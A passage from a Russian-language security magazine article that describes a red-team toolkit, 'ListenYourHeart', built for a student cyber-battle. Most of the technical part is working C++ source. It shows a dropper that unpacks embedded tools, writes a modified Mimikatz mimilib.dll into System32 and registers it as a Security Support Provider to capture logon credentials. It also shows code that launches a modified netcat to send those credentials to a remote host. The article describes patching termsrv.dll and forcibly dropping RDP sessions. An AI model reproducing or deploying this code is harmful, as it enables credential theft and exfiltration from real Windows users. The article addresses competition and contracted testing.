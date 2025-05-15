Се­год­ня мы напишем нес­коль­ко ути­лит, которые перех­ватыва­ют в реаль­ном вре­мени и отправ­ляют на уда­лен­ный хост учет­ные дан­ные поль­зовате­лей, поз­воля­ют запус­кать нес­коль­ко сес­сий RDP и раз­рывать кон­куриру­ющие под­клю­чения.

В 2024 году про­ходи­ла все­рос­сий­ская сту­ден­ческая кибер­битва, в которой мне пос­час­тли­вилось учас­тво­вать в сос­таве коман­ды Team8.

Тог­да нам уда­лось одер­жать победу, и сей­час я хочу рас­ска­зать об одной из сос­тавля­ющих под­готов­ки к сорев­новани­ям. А имен­но о соз­дании offensive tools — ути­лит, упро­щающих жизнь учас­тни­кам Red Team.

Нем­ного поковы­ряв Standoff, я взял на замет­ку нес­коль­ко момен­тов, которые пос­тарал­ся учесть в сво­ей прог­рамме:

час­тое исполь­зование ути­лит, свя­зан­ных с добыва­нием учет­ных дан­ных в сис­теме (нап­ример, Mimikatz);

пе­риоди­чес­кие кон­флик­ты меж­ду учас­тни­ками за общие ресур­сы (в основном RDP-дос­туп к уда­лен­ному хос­ту), пос­коль­ку инфраструк­тура одна на всех.

Прог­рамма писалась за десять дней до сорев­нований, поэто­му, воз­можно, некото­рые решения покажут­ся тебе не сов­сем эле­ган­тны­ми. Но в усло­виях цей­тно­та получи­лось то, что получи­лось.

warning Статья име­ет озна­коми­тель­ный харак­тер и пред­назна­чена для спе­циалис­тов по безопас­ности, про­водя­щих тес­тирова­ние в рам­ках кон­трак­та. Автор и редак­ция не несут ответс­твен­ности за любой вред, при­чинен­ный с при­мене­нием изло­жен­ной информа­ции. Рас­простра­нение вре­донос­ных прог­рамм, наруше­ние работы сис­тем и наруше­ние тай­ны перепис­ки прес­леду­ются по закону.

ListenYourHeart

Ос­новная фун­кция этой ути­литы — перех­ват и рет­ран­сля­ция на уда­лен­ный хост учет­ных дан­ных поль­зовате­лей в реаль­ном вре­мени, а так­же орга­низа­ция про­тиво­дей­ствия (не выходя­щего за рам­ки при­личия) поль­зовате­лям из дру­гих команд Red Team.

Пос­коль­ку раз­работ­ка прог­раммы име­ла жес­ткое огра­ниче­ние по вре­мени, целесо­образно было обра­тить­ся к готовым опен­сор­сным решени­ям в этой области, что я и сде­лал.

Прог­рамма сос­тоит из пяти модулей:

LyH.cpp — основной модуль, выпол­няющий под­готови­тель­ные опе­рации;

— основной модуль, выпол­няющий под­готови­тель­ные опе­рации; mimilib.dll — модифи­циро­ван­ный secuirty support provider из ути­литы Mimikatz, перех­ватыва­ющий учет­ные дан­ные поль­зовате­ля;

— модифи­циро­ван­ный secuirty support provider из ути­литы Mimikatz, перех­ватыва­ющий учет­ные дан­ные поль­зовате­ля; mefcat.exe — модифи­циро­ван­ный netcat, переда­ющий учет­ные дан­ные поль­зовате­ля на уда­лен­ный хост;

— модифи­циро­ван­ный netcat, переда­ющий учет­ные дан­ные поль­зовате­ля на уда­лен­ный хост; PatchTermSrv.exe — скрипт, который пат­чит termsrv. dll , что­бы появи­лась воз­можность соз­давать мно­жес­тво сеан­сов RDP на одной и той же машине;

— скрипт, который пат­чит , что­бы появи­лась воз­можность соз­давать мно­жес­тво сеан­сов RDP на одной и той же машине; KoH.bat — скрипт, авто­мати­чес­ки отклю­чающий активные сеан­сы RDP.

Инициализация

Что­бы начать работу, прог­рамма дол­жна быть обес­печена необ­ходимым окру­жени­ем. Этим занима­ется класс dropp3r из модуля LyH. cpp . Dropp3r соз­дает пап­ку в кор­не дис­ка C: с име­нем temp , выг­ружа­ет фай­лы, зашитые в исполня­емый файл прог­раммы, с исполь­зовани­ем механиз­ма ресур­сов, а так­же регис­три­рует Security Support Provider в сис­теме:

class dropp3r { public: dropp3r ( ) = default ; int createTempDirectory () ; int dropRelations () ; int loadProvider () ; } ; // Выгрузка необходимых инструментов и зависимостей int dropp3r : : dropRelations ( ) { const std : : string files [ ] = { "patchTerm. exe" s , "KoH. bat" s , "nc6. exe" s } ; for ( int i = 1 ; i < 4 ; i ++ ) { HRSRC hRes = FindResource ( NULL , MAKEINTRESOURCE ( i ) , RT_RCDATA ) ; if ( ! hRes ) return ERR_NOT_FOUND ; HGLOBAL hData = LoadResource ( NULL , hRes ) ; if ( ! hData ) return RESOURCE_NOT_LOAD ; void * pData = LockResource ( hData ) ; DWORD size = SizeofResource ( NULL , hRes ) ; std : : string outPath = PATH + " \ " s + files[ i - 1] ; std:: ofstream out( outPath, std:: ios:: binary | std:: ios:: out) ; if ( !out) return NO_CREATE_FILE; out. write( static_cast< const char*>( pData), size) ; out. close() ; } return 0; } // Выгрузка и регистрация Security Support Provider в системе int dropp3r:: loadProvider() { HRSRC hRes = FindResource( NULL, MAKEINTRESOURCE( 7), RT_RCDATA) ; if ( !hRes) return ERR_NOT_FOUND; HGLOBAL hLoadedResource = LoadResource( NULL, hRes) ; if ( !hLoadedResource) return RESOURCE_NOT_LOAD; void* pMim = LockResource( hLoadedResource) ; DWORD size = SizeofResource( NULL, hRes) ; LPWSTR packagePath = ( LPWSTR) TEXT( " c : \ \ windows \ \ system32 \ \ mimilib . dll ") ; SECURITY_PACKAGE_OPTIONS spo = {} ; HANDLE hMimilib = CreateFileW( packagePath, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL) ; DWORD wrtn = 0; WriteFile( hMimilib, ( LPCVOID) pMim, size, & wrtn, NULL) ; CloseHandle( hMimilib) ; std:: cout< < " [ dropp3r ] Trying to add security package . . . \ n "; SECURITY_STATUS ss = AddSecurityPackageW( packagePath, & spo) ; if ( ss != SEC_E_OK) { if ( ss == SEC_E_SECPKG_NOT_FOUND) { std:: cout< < " [ dropp3r ] can ' t find mimilib [ - ] \ n "; return ERR_NOT_FOUND; } else { std:: cout < < " [ dropp3r ] FAILED ! [ - ] \ n "; return ERROR; } } else { std:: cout < < " [ dropp3r ] SUCCESS ! [ + ] \ n "; } return 0; }

www Для более глу­боко­го пог­ружения в тему, свя­зан­ную с SSP/AP, советую про­читать статью «Пос­тавщик небезо­пас­ности. Как Windows рас­кры­вает пароль поль­зовате­ля».

Создание канала передачи данных

Пос­ле соз­дания окру­жения необ­ходимо орга­низо­вать канал переда­чи дан­ных. В этом про­цес­се учас­тву­ют три эле­мен­та:

SecuritySupportProvider , который переда­ет дан­ные в сыром виде;

, который переда­ет дан­ные в сыром виде; mefcat (модифи­циро­ван­ный netcat), который находит­ся на сто­роне жер­твы, получа­ет нап­рямую от SSP кре­ды поль­зовате­ля и переда­ет их на уда­лен­ный хост;

(модифи­циро­ван­ный netcat), который находит­ся на сто­роне жер­твы, получа­ет нап­рямую от кре­ды поль­зовате­ля и переда­ет их на уда­лен­ный хост; netcat на сто­роне ата­кующе­го, при­нима­ющий кре­ды от mefcat.

Сервер

Для свя­зыва­ния mefcat с SSP я выб­рал име­нован­ные пай­пы, а так­же Windows-события (Windows Events). И вот почему:

pipe — дос­таточ­но надеж­ный канал переда­чи дан­ных. При воз­никно­вении оши­бок их мож­но лег­ко отсле­дить и локали­зовать;

гло­баль­ные события отлично под­ходят для син­хро­низа­ции про­цес­сов.

Для начала необ­ходимо уста­новить соеди­нение с уда­лен­ным хос­том — получить сокет для вза­имо­дей­ствия с ним. Этим занима­ется класс Listen3r из модуля LyH. cpp . Единс­твен­ная его фун­кция — соз­дание про­цес­са mefcat с передан­ным адре­сом уда­лен­ной машины.

LyH.cpp

int listen3r : : buildChannel ( std : : string IP , std : : string PORT ) { // .. . std : : string commandLine = "c: \ \ windows \ \ system32 \ \ cmd. exe / c " s + PATH + "nc6. exe " s + IP + " " s + PORT ; // .. . if ( CreateProcessA ( NULL , ( LPSTR ) ( commandLine . c_str ()) , NULL , NULL , FALSE , CREATE_NEW_CONSOLE , NULL , NULL , ( LPSTARTUPINFOA ) ( & si ) , & pi ) ) { SleepEx ( 5000 , FALSE ) ; CloseHandle ( pi . hProcess ) ; CloseHandle ( pi . hThread ) ; } else { // .. .

За­тем, пос­ле получе­ния сокета, соеди­няем mefcat с mimilib. dll .

mefcat.c